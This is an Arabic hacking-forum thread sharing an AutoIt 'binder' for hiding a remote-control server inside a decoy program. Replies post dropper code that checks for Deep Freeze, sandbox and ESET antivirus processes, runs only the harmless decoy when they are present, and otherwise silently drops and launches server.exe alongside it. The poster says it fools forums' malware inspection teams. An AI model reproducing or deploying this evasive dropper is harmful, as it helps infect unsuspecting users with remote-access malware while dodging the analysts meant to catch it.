|priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

تم تحميل الصفحة في 1,7511514 ثانية
|priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|
الحالة
مغلق و غير مفتوح للمزيد من الردود.

alfraby

Beginner Developer
rankrank
إنضم
26 ديسمبر 2009
المشاركات
270
الإعجابات
26
النقاط
0
السسلام عليكم

عمل تلغيمه

لما تفحص بـ نظام وهمي راح تتخطاه التلغيمه .. ولما تفحص وانت مجمد االنظام ماراح يعمل السيرفر وبكذا ماراح يكشف البيانات ..

~
التلغيمه تنفع للمنتديات الهكر الي لهم فريق فحص .. بيرد لك "نضيف"
وكل من دخل الموضوع حمل < ابري ذمتي من الي يستخدمها على المسلمين ،

الشرح على اليوتيوب
http://www.youtube.com/watch?v=P_EB_37aMng&feature=player_embedded

لتحميل الكود

http://www.mediafire.com/?4giq5pdi8kbo64r


منقووول
 
إنضم
9 مارس 2011
المشاركات
4,759
الإعجابات
2,232
النقاط
113
الإقامة
ALGERIA
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

جاري التحميا والمشاهدة ، والتقييم ان امكن ، بالطبع ، بعد مرور فريق الفحص
 

thmaster100

ExpErt DeveloPer
rankrankrankrank
إنضم
20 مارس 2009
المشاركات
1,050
الإعجابات
180
النقاط
0
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

كود:
$d= ProcessExists("FrzState2k.exe")
$e= ProcessExists("DFServ.exe")
$h= ProcessExists("DefenderDaemon.exe")
if $d or $e or $h then
FileInstall("Program.exe","c:\Program.exe",1)
run("Program.exe")
    Else
FileInstall("Program.exe","c:\Program.exe",1)
FileInstall("server.exe","c:\server.exe",1)
run("c:\Program.exe")
run("c:\server.exe")
EndIf

مشكور على المشاركة

تفضل تطوير الكود

بارك الله فيك

تم التقييم


تشاو
 

9D1

DeveloPer Plus
rankrankrankrankrank
إنضم
10 مارس 2011
المشاركات
2,410
الإعجابات
1,356
النقاط
113
الإقامة
dev-point
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

بجد انا مو فاهم طيب والكود دة هنعمل بى اية شكرا انا مو فاهم بجد:31:
 

mamiman

Active DeveloPer
rankrankrank
إنضم
10 أبريل 2009
المشاركات
517
الإعجابات
99
النقاط
28
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

هذا الكود تعمل له كومبايل و تأخذ الملف الناتج و تلغم به ، و هكذا يكون السرفر يتخطى البرامج المكتوبة في الكود :10:
قيمني إن أفدتك
 
إنضم
22 أغسطس 2010
المشاركات
1,925
الإعجابات
747
النقاط
0
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

تسلم يا غالي
 

alfraby

Beginner Developer
rankrank
إنضم
26 ديسمبر 2009
المشاركات
270
الإعجابات
26
النقاط
0
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

يآهلا منوريين :32:
 

mr.hacker 009

Beginner Developer
rankrankrank
إنضم
10 مارس 2011
المشاركات
642
الإعجابات
10
النقاط
0
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

يعطيك العآفية ,, ابن بلدي :32:
 
إنضم
10 مارس 2011
المشاركات
7,518
الإعجابات
1,185
النقاط
113
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|


يــَعـطـيـك ألـف عـَآفـيـة

:13:
 

hajji haji

Active DeveloPer
rankrankrank
إنضم
11 مارس 2011
المشاركات
731
الإعجابات
32
النقاط
28
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

:32::32::32::32::32:
 

Black-ID

VIP DeveloPer
rankrankrankrank
إنضم
28 يناير 2010
المشاركات
1,685
الإعجابات
530
النقاط
113
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

كود:
$d= ProcessExists("FrzState2k.exe")
$e= ProcessExists("DFServ.exe")
$h= ProcessExists("DefenderDaemon.exe")
if $d or $e or $h then
FileInstall("Program.exe","c:\Program.exe",1)
run("Program.exe")
    Else
FileInstall("Program.exe","c:\Program.exe",1)
FileInstall("server.exe","c:\server.exe",1)
run("c:\Program.exe")
run("c:\server.exe")
EndIf

مشكور على المشاركة

تفضل تطوير الكود

بارك الله فيك

تم التقييم


تشاو

اضافة بسيطة للنود لأنه يُتخطى

كود:
ProcessExists("FrzState2k.exe")
$n= ProcessExists("egui.exe")
$e= ProcessExists("DFServ.exe")
$h= ProcessExists("DefenderDaemon.exe")
if $n or $d or $e or $h then
FileInstall("Program.exe","c:\Program.exe",1)
run("Program.exe")
    Else
FileInstall("Program.exe","c:\Program.exe",1)
FileInstall("server.exe","c:\server.exe",1)
run("c:\Program.exe")
run("c:\server.exe")
EndIf
:10:
 

viva plus dz

Active DeveloPer
rankrankrank
إنضم
9 مارس 2011
المشاركات
702
الإعجابات
109
النقاط
43
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

:8::8::8::8::8:
 

alfraby

Beginner Developer
rankrank
إنضم
26 ديسمبر 2009
المشاركات
270
الإعجابات
26
النقاط
0
رد: |priv8|التـلغيم بـ AutoIt وتخطي جميع الانظمة الوهميه + الحقيقيه ( 3 )|

يعطيكم العفايه عمل الكود انه مايضهر اي اتصال في حاله تجميد النضام :30:
يعني بعد ماقرات تطوير الكود راح يكشف البيانات اذا فحصت وانت مجمد النضام :32:

منورين :32:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل